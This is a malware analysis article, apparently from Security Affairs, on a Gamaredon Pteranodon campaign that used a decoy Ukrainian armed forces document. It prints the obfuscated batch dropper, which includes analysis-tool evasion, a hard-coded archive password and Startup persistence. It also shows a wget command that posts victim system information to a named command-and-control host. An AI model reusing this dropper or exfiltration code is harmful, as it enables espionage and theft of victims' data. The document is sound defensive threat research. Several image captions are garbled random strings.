Security researchers at Yoroi-Cybaze ZLab uncovered a new campaign carried out by the Russian state-actor dubbed Gamaredon.


Few days after the publication of our technical article related to the evidence of possible APT28 interference in the Ukrainian elections, we spotted another signal of a sneakier on-going operation.

This campaign, instead, seems to be linked to another Russian hacking group: Gamaredon.  The Gamaredon APT was first spotted in 2013 and in 2015, when researchers at LookingGlass shared the details of a cyber espionage operation tracked as Operation Armageddon, targeting other Ukrainian entities. Their “special attention” on Eastern European countries was also confirmed by CERT-UA, the Ukrainian Computer Emergency Response Team.

The discovered attack appears to be designed to lure military personnel: it  leverage a legit document of the “State of the Armed Forces of Ukraine” dated back in the 2nd April 2019. 

- ttPVvjZolUufWaf2b3Z7 91qFptcnvY7pjIjtfL63AyjE8ttvD6jOJBn01UQyK3Ehuk xTRSHz9o7AVYGV5kW090bopCy3 zejWyHEX3Ef9wzvQw1hvFDE8lQoRsDefwY0lrJU8 - Russian Shadow behind the Gamaredon ‘s Ukrainian MOD CampaignSecurity Affairs
Figure 1: Fake document shown after infection

For this reason, Cybaze-Yoroi ZLAB team dissected this suspicious sample to confirm the possible link with Russian threat actors.

Technical Analysis

The origin of the infection is an executable file pretending to be an RTF document.

Sha256 41a6e54e7ac2d488151d2b40055f3d7cacce7fb53e9d33c1e3effd4fce8014
Threat Gamaredon Pteranodon stager (SFX file)
Ssdeep 12288:VpRN/nV+Nn3I4Wyawz2O7TE+sNEAMqdJnGB6q5c7pQbaOwWsAsK0iR7bkfeanZ8O:VpT/nV+N3I

Table 1: Information about analyzed sample

Actually, the file is a Self Extracting Archive (SFX) claiming to be part of some Oracle with an invalid signature. Its expiration date has been set up the 16th of March 2019.

- ghbzMnvhDyU4e3tBJPWZnN1xuxXX7hjwXVqQbXX0mTsQbdzVl4xYIm9cM5PaXWwReFYAQP2JiW2jRUyO6967wT0lCb9PNE3jm54gNcW1knISr2wXEtXkvBJgpl DiJtKg fnn7A - Russian Shadow behind the Gamaredon ‘s Ukrainian MOD CampaignSecurity Affairs
Figure 2: Fake Oracle certificate with an expiration date set on 16th of March 2019

A first glance inside the  SFX archive reveals four different files. One of them is batch file containing the actual infection routine.

- 8RkxMuS gO4AI nwQJGgyK4Hgi4b4muSi9 wm 0 Plrjyxj 9MGIhoUo4HZwK6rh4rSSty7UkRFLi1MadVP20rn32jc9V w5IyYoFS2cpL2FVM2hfzc3PbF3Tey3fVEMqOdkSig - Russian Shadow behind the Gamaredon ‘s Ukrainian MOD CampaignSecurity Affairs
Figure 3: Files contained in SFX archive
@echo offset xNBsBXS=%random%*JjuCBOSFor %%q In (wireshark procexp) do (TaskList /FI “ImageName EQ %%q.exe” | Find /I “%%q.exe”)If %ErrorLevel% NEQ 1 goto exitIf SddlzCf==x86 Set WqeZfrx=x64if SddlzCf==qKLGBsL set SddlzCf=%random%*xNBsBXS-JjuCBOSset “ldoGIUv=%APPDATA%MicrosoftWindowsStart MenuProgramsStartup”CEFNPKLIf SddlzCf==x86 Set WqeZfrx=x64set “UlHjSKD=%USERPROFILE%”set qKLGBsL=%SddlzCf%+%JjuCBOS%-xNBsBXSset fnQWAZC=winsetupset xNBsBXS=%random%*JjuCBOSset qKLGBsL=%SddlzCf%+%JjuCBOS%-xNBsBXSset “paJvVjr=Document”if SddlzCf==qKLGBsL set SddlzCf=%random%*xNBsBXS-JjuCBOSset eBqwVLK=%fnQWAZC%.lnkCEFNPKLif SddlzCf==qKLGBsL set SddlzCf=%random%*xNBsBXS-JjuCBOSset YFCaOEf=28262set qKLGBsL=%SddlzCf%+%JjuCBOS%-xNBsBXSset vvozoFB=11326set lDwWuLo=26710If SddlzCf==x86 Set WqeZfrx=x64set prJqIBB=dcthfdyjdfcdst,tvset qKLGBsL=%SddlzCf%+%JjuCBOS%-xNBsBXSif SddlzCf==qKLGBsL set SddlzCf=%random%*xNBsBXS-JjuCBOStaskkill /f /im %fnQWAZC%.exeCEFNPKLRENAME “%lDwWuLo%” %lDwWuLo%.exeset xNBsBXS=%random%*JjuCBOS%lDwWuLo%.exe “-p%prJqIBB%set qKLGBsL=%SddlzCf%+%JjuCBOS%-xNBsBXScopy /y “%fnQWAZC%” “%UlHjSKD%%fnQWAZC%.exe”if SddlzCf==qKLGBsL set SddlzCf=%random%*xNBsBXS-JjuCBOSif exist “%UlHjSKD%%fnQWAZC%.exe” call :GhlJKaGIf SddlzCf==x86 Set WqeZfrx=x64if not exist “%UlHjSKD%%fnQWAZC%.exe” call :PEEnqrLset xNBsBXS=%random%*JjuCBOSRENAME “%YFCaOEf%” %eBqwVLK%if SddlzCf==qKLGBsL set SddlzCf=%random%*xNBsBXS-JjuCBOScopy “%eBqwVLK%” “%ldoGIUv%” /yset qKLGBsL=%SddlzCf%+%JjuCBOS%-xNBsBXSRENAME “%vvozoFB%” “%paJvVjr%.docx”if SddlzCf==qKLGBsL set SddlzCf=%random%*xNBsBXS-JjuCBOS”%CD%%paJvVjr%.docx”set xNBsBXS=%random%*JjuCBOSexit /b
:GhlJKaGif SddlzCf==qKLGBsL set SddlzCf=%random%*xNBsBXS-JjuCBOSstart “” “%UlHjSKD%%fnQWAZC%.exe”CEFNPKLexit /b
:PEEnqrLset xNBsBXS=%random%*JjuCBOSRENAME “%fnQWAZC%” %fnQWAZC%.exe::6start “” “%fnQWAZC%.exe”If SddlzCf==x86 Set WqeZfrx=x64exit /b

Firstly, this batch script looks for the presence of running Wireshark and Process Explorer programs through the tasklist.exe utility. Then it renames the “11326” file in “Document.docx” and opens it. This is the decoy document seen in Figure 1. 

The third step is to extract the contents of the password protected archive named “26710”. The scripts uses the hard-coded password “dcthfdyjdfcdst,tv” to extract its content, placing them it on “%USERPROFILE%winsetup.exe” and creating a LNK symlink into the “%APPDATA%MicrosoftWindowsStart MenuProgramsStartup” directory to ensure its persistence.

Sha256 653a4205fa4bb7c58ef1513cac4172398fd5d65cab78bef7ced2d2e828a1e4b5
Threat Gamaredon Pteranodon stager (SFX)
Ssdeep 12288:9pRN/nV+Nn4mNoks/EysKvqjigldJuFjBqg9DmTBs34I8:9pT/nV+N4QokKK7zg9qgQI8

Table 2: Information about SFX stager

This additional file is a SFX file containing another script and a PE32 binary.

- 9W6yW5OlrL1aswx9iLos8bfyL8U045o9yloFFxBNDT5ABngmzsabFYUa GgrWAn62WoQH79xtpixDif4k3SJn qobh9BE61zblc48xHxJD7DXXpcGUtbdx3V3cXctTuYVoBLzno - Russian Shadow behind the Gamaredon ‘s Ukrainian MOD CampaignSecurity Affairs
Figure 4: Files contained in SFX archive

MicrosoftCreate.exe” file is the UPX-packed version of the “wget” tool compiled for Window, a utility for non-interactive HTTP downloads and uploads, a flexible tool commonly used by sys-admins and sometimes abused by threat actors.

The actual malicious logic of the Pteranodon implant is contained within the “30347.cmd” script. Besides junk instructions and obfuscation, the gather information about the compromised machine through the command “systeminfo.exe”. The results are stored into the file “fnQWAZC” and then sent to the command and control server “librework[.ddns[.net”, leveraging the wget utility previously found.

-  NojS6vNz6RUi1KTwOMV30I z0EOAdqxYHbyKXUGHguYIS8jZP5pfAR8qm4GPxgSUpcZoWTMiCTWDojpVVuWQ4 L20amqnJF16Hww93cKf  Zb3FDLdsBjBX yzYaHDo EDkPsk - Russian Shadow behind the Gamaredon ‘s Ukrainian MOD CampaignSecurity Affairs
Figure 5: The C2 and obfuscations technique
MicrosoftCreate.exe –user-agent=”Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0″ –post-=”versiya=arm_02.04&comp=ADMIN-PC&id=ADMIN-PC_del&sysinfo=Nome host:                            ADMIN-PC+###…….”
- Q hHQCWib7snITGag5 zb3ZagX9vfMLU3NrETBNufy1pPLl7jcTen8doODx1tIu1Un86KjuCkBGq8QGlNBG52gVEkTRogkszR9sGni31oqTub4wSMg51h9iWKdlhvUjjhK9YbBM - Russian Shadow behind the Gamaredon ‘s Ukrainian MOD CampaignSecurity Affairs
Figure 6: Information about victim machine sent to C2

The malware also schedules the execution of two other actions.

- 7lko 2TTkkPxYdC 6BoWUHrCoB47dir8A8czPjlmBJw3ndO SPTo6m3x7sNLy9UJI7fRQAwiSGP1XcUTm EvRjSAO9oHJCy4s36IYBq76y9ZnHHTiSNS6GYhhfGDEEz18WBk0tg - Russian Shadow behind the Gamaredon ‘s Ukrainian MOD CampaignSecurity Affairs
Figure 7: Persistence through task schedule

The first one tries to contact “bitwork[.ddns[.net” to download a “setup.exe” file and store it in the same folder. The other file, “ie_.exe”, is stored into the  “%APPDATA%RoamingMicrosoftIE” folder. Despite the different name, it actually is another copy of the wget tool.

- 3GBnukrgVFp0qTiuFsP Wgb3RveDksCVs44tMQz2X SVT5u zZ9rbhg82xZ4Q9eFfC40Vhy9e5r2cOpArs3oHkIqJZCc9rZmnWY8Q2Xx 0x1nEteyf1TCM4H2MU81fYrEcpptX8 - Russian Shadow behind the Gamaredon ‘s Ukrainian MOD CampaignSecurity Affairs
Figure 8: Persistence through task schedule (II)

The second scheduled activity is planned every 32 minutes and it is designed to run the files downloaded by the previous task. A typical trick part of the Gamaredon arsenal from long time: in fact, the recovered sample is part of the Pteranodon implant and matches its typical code patterns, showing no relevant edits with respect to previous variants.

In the end, investigating the “librework[.ddns[.net” domain we discovered several other samples connect to the same C2. All of them appeared in-the-wild during the first days of April, suggesting the command might still be fully functional.

- J Cca4wSV0eCz8PjNd2b8iSbXqXvVUn 9oDQPbl9 F3U31nyxWltsG1SPqoLC4z5yf cNEIwHG4bzO8Knw0YbtStp Jl4OD3IrcUx8tb0COQdq2q08oUnPcmLLB0aqWwwf4zJu0 - Russian Shadow behind the Gamaredon ‘s Ukrainian MOD CampaignSecurity Affairs
Figure 9: other samples linked to “librework[.ddns[.net” C2 (Source:VT)


The Pteranodon implant seems to be constantly maintained by the Gamaredon APT group since 2013, a tool the attackers found very effective since they are still using it after such a long time. Apart this technical consideration, is quite interesting to notice how strong seems to be the Russian interest towards the East-Europe, along with the other recent state-sponsored activities possibly aimed to interfere with the Ukrainian politics (See “APT28 and Upcoming Elections: evidence of possible interference” and Part II), confirming this cyber-threat is operating in several fronts.

Further details, including Indicators of Compromise and Yara rules, are reported in the analysis published on the Yoroi Blog.  

Pierluigi Paganini

(SecurityAffairs – Ukraine, Gamaredon)

Source link

No tags for this post.


Please enter your comment!
Please enter your name here